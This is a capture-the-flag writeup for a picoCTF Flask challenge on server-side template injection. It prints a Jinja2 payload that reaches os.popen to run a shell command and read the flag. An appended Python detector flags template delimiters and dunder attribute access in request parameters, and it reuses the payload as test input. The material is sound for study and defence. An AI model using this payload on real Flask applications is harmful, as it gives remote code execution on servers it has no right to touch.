Tags: ssti 


# ▼▼▼Flaskcards and Freedom - Points: 900▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

There seem to be a few more files stored on the flash card server but we can't login. Can you? http://2018shell2.picoctf.com:5010 (link)

・There's more to the original vulnerability than meets the eye.
・Can you leverage the injection technique to get remote code execution?
・Sorry, but the database still reverts every 2 hours.


## 【Aim for remote code execution】


`app flag server.py xinet_startup.sh`

There is a `flag` file.


`{{url_for.__globals__.os.__dict__.popen('cat flag').read()}}`
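From the defender's side, the payload above has a recognisable shape: a template expression that walks dunder attributes such as `__globals__` and `__dict__`. The following is an added example, not part of the original writeup: a heuristic request-parameter check that complements, and does not replace, keeping user input out of template source. The `/cards` route, the parameter names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote_plus, unquote_plus, urlsplit

# Jinja2 expression or statement delimiters: {{ ... }} or {% ... %}
DELIMS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
# Dunder names reached by attribute, subscript or the attr() filter,
# e.g. .__globals__, ['__dict__'], |attr('__class__')
DUNDER = re.compile(r"""(?:\.|\[\s*['"]|attr\(\s*['"])(__\w+__)""")

# Payload quoted from the writeup; used here only as detector input.
PAGE_PAYLOAD = "{{url_for.__globals__.os.__dict__.popen('cat flag').read()}}"
# Constructed request targets (hypothetical route and parameter names).
SAMPLE_TARGETS = [
    "/cards?question=What+is+2%2B2%3F",                         # ordinary text
    "/cards?question=" + quote_plus("{{ name }}"),              # template syntax only
    "/cards?question=" + quote_plus(PAGE_PAYLOAD),              # URL-encoded once
    "/cards?answer=" + quote_plus(quote_plus(PAGE_PAYLOAD)),    # double-encoded
]

def decode_fully(value, max_rounds=3):
    """Undo repeated URL-encoding so double-encoded input is still inspected."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_value(value):
    """Return (severity, dunder_names) for one request parameter value."""
    text = decode_fully(value)
    exprs = DELIMS.findall(text)
    if not exprs:
        return "none", []
    dunders = sorted({d for e in exprs for d in DUNDER.findall(e)})
    return ("high" if dunders else "low"), dunders

def scan_requests(targets):
    """Return (target, param, severity, dunders) for each suspicious parameter."""
    findings = []
    for target in targets:
        query = urlsplit(target).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            severity, dunders = inspect_value(value)
            if severity != "none":
                findings.append((target, name, severity, dunders))
    return findings

if __name__ == "__main__":
    for _, param, severity, dunders in scan_requests(SAMPLE_TARGETS):
        print(param, severity, dunders)
```

A `low` hit means template delimiters reached the server at all, which is worth reviewing against how the application builds its templates; a `high` hit means the expression also reaches for interpreter internals.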